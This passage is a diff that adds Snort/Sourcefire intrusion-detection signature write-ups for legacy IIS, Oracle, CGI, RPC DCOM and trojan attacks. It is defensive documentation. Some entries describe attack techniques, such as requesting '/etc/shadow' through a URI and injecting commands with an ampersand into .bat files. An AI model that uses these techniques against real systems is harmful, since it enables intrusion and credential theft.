+Microsoft Data Access Components (MDAC) provides web and database integration.  The RDS component of MDAC enables remote web access to database services through the Internet Information Server (IIS).  A vulnerability exists in the DataFactory component of RDS that may permit unauthenticated users to query databases.  Depending on other software installed, it may be possible to execute arbitrary commands on IIS. 
+
+--
+Affected Systems:
+IIS 3.0, 4.0 servers 
+
+--
+Attack Scenarios:
+An attacker can exploit the vulnerability to get access to remote databases or, under certain software configurations, get access to the remote IIS server to run arbitrary commands. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Follow the configuration changes in the referenced Microsoft link.
+
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1011
+
+Bugtraq.
+http://www.securityfocus.com/bid/529
+
+Microsoft 
+http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
+
+
+--
--- /dev/null
+++ b/doc/signatures/976.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+976
+
+--
+Summary:
+This event is generated when an attempt is made to reference a .bat file to execute arbitrary commands on an Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can execute arbitrary commands on the IIS server with the privileges of the user running IIS.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses .bat and .cmd to execute code using the Common Gateway Interface (CGI).  A .bat file or .cmd file can be passed a malicious command to be executed on the server.  This is accomplished by preceding the malicious command with an ampersand.  This allows execution of arbitrary commands with the privileges of the user running IIS.
+
+--
+Affected Systems:
+Hosts running IIS 1.0
+
+--
+Attack Scenarios:
+An attacker can pass a .bat or .cmd file a malicious command to be executed.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://support.microsoft.com/support/kb/articles/Q148/1/88.asp
+http://support.microsoft.com/support/kb/articles/Q155/0/56.asp
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0233
+
+Bugtraq
+http://www.securityfocus.com/bid/2023
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10362
+
+--
--- /dev/null
+++ b/doc/signatures/466.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+466
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running the L3 "Retriever 1.5" security scanner.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running the L3 "Retriever 1.5" security scanner contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS311
+
+--
--- /dev/null
+++ b/doc/signatures/2726.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2726
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1723.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1723
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000694.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000694
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "gbrowse.php" with SQL commands being passed as the "cat_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "cat_id" parameter in the "gbrowse.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1624.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1624
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1372.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+1372
+
+--
+Summary:
+This event is generated when an attempt is made to retrieve a protected
+system file on a host via a web request.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+The shadow file usually found in the /etc/ directory on UNIX based
+systems, contains login information for users of a host.
+
+In this case, the rule will generate an event due to the attempted
+transfer of a shadow file. This file is generally used on muli-user
+systems to provide greater security for user passwords. This file should
+only be readable by the super user. If an attacker was successful in
+retrieving this file, they could then obtain valid login information for 
+the system by using widely available password cracking tools on the file.
+
+The file may also be used to garner information that may be used in
+brute force password guessing attacks against the host.
+
+--
+Affected Systems:
+	All UNIX based systems running a Web Server.
+ 
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/shadow'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2653.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2653
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_og.begin_load" procedure is used for
+offline instantiation of master groups.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000705.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000705
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "test.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "test.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/891.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+891
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+upload.pl via a web browser.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited
+by the attacker.
+
+This event indicates an attempt to access the CGI application upload.pl,
+this perl script can be used to upload files to a system and may be used
+by an attacker to place files of their choosing onto a server for
+further use.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Ensure that access controls are in place to limit access to the
+application to authorized users only.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2064.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2064
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
--- /dev/null
+++ b/doc/signatures/1458.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1458
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Blackboard CourseInfo running on  a web server. 
+
+Any valid user is able to modify the contents of the database by
+supplying form values of their choosing to the perl scripts running the
+application.
+
+--
+Affected Systems:
+	Blackboard CourseInfo 4.0 for UNIX and Windws NT
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the application to the latest non-affected version of the
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3209.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3209
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/902.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+902
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000649.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000649
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "comment" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2865.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2865
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2808.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2808
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure suspend_master_activity
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/811.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+811
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1048.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1048
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3377.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3377
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2100.txt
@@ -0,0 +1,123 @@
+Rule:
+
+--
+Sid: 2100
+
+--
+Summary:
+Subseven 2.1 Gold is a Trojan Horse offering complete control of the 
+infected host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+No other systems are affected. This is a windows executable that makes 
